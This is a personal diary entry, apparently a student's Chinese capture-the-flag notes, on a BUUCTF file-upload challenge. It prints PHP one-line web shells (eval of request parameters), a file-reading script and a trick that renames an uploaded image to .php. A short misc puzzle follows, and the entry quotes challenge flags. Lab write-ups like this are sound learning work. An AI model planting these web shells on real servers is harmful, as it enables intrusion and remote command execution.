22.1.12
又是新的一天,感冒稍微好了点
希望今天的状态可以不错。
还在学一些别的东西。
typora收费了,咱用的是最后一个免费版,主要是正版属实有点小贵。
BUU UPLOAD COURSE 1
打开网页是一个文件上传的系统。
试一试一句话木马
<?php @eval($_GET["cmd"]); ?>
显示文件已储存在: uploads/61de2ea9af7ad.jpg
试一试
http://091478d9-fcbd-4c2d-bda0-ec5a37ef84eb.node4.buuoj.cn:81/index.php?file=uploads/61de2ea9af7ad.jpg
似乎没有显示
试试能不能蚂蚁剑连入。
在蚂蚁剑代码解压出错的时候,我又试了试这个
<?php
echo "owo";
?>
有输出。owo
另外吐槽一下winrar的解压机制,每次都要从C盘复制回来是什么鬼啊。
呃,蚂蚁剑好像有点问题,等待的时候去玩玩misc
蚂蚁剑总算能用了。
中文名真的是个恐怖的东西。
竟然显示返回数据为空。
那就试试手动构建
<?php @eval("ls"); ?>
好像eval被禁用了。
但是问题不大,发现php文件是可以被执行的。于是,直接用php枚举文件。
检查目录:/tmp
/tmp/flag.sh
/tmp/html/index.php
/tmp/html/upload.php
发现了flag
尝试获得文件。
用phpcat进行cat文件。
#!/bin/bash echo $FLAG >> /flag export FLAG=not_flag FLAG=not_flag rm -f /flag.sh
真的是..
那就继续搜
/tmp/html/index.php 没有什么值钱的东西
/tmp/html/upload.php 也没有什么值钱的东西
那就试试/flag
flag{55ff3ec8-67fe-4b64-be71-e1ef8556f3aa}
真的服了,猜中了。
问题就在这,开始的暴力枚举的脚本遇到没权限的会报错,但是我也没写try所以有问题。
但为什么evel不能用呢?
phpcat.php
<?php
$the_file_path = "/tmp/flag.sh" ;
$fp = fopen ( $the_file_path , "r" );
$str = fread ( $fp , filesize ( $the_file_path ));
echo $str;
?>
吼住
- 网上说好像.jpg 蚂蚁剑不能直接执行,那么是不是可以用php把代码重名为.php呢?
- 说干就干!
第3个小标
<?php //uploads/61de3a0442c88.jpg echo "try:"; echo rename("uploads/61de3a0442c88.jpg","uploads/e.php"); ?> 得到: try:1
第4个小标
//用之前的脚本 ./uploads/61de380d1be04.jpg ./uploads/61de3828bcf26.jpg ./uploads/61de382bed83e.jpg ./uploads/61de3831f1d58.jpg ./uploads/61de387f9098f.jpg ./uploads/61de3a4fed328.jpg ./uploads/e.php ./uploads/61de3ac10a928.jpg 那么是不是成功了呢? <?php @eval(system($_POST["owo"]));?>
还是显示连接失败,但是访问
/uploads/ee.php
已经显示有空白页面,而且不是nginx的
我觉得是服务器禁止了eval
- 结束:看别人的博客看到了一个挺不错的软件,叫POSTMAN
N种方法解决
- 下载下来是个exe
- 发现好像没法直接运行。没法zip打开。
- linux下file
KEY.exe: ASCII text, with very long lines, with no line terminators
- 看样子是个图片,扫描显示
KEY{dca57f966e4e4e31fd5b15417da63269}
qr
- ......
- 欢迎参加本次比赛,密码为 Flag{878865ce73370a4ce607d21ca01b5e59}
- .....